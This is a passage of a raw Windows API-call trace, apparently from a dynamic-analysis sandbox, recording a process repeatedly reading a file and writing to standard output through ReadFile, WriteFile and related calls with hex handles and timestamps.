lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.190] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.190] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.267] GetFileType (hFile=0x50) returned 0x1 [0218.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.267] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.267] GetFileType (hFile=0x50) returned 0x1 [0218.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.267] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.268] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.268] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.269] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.269] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, 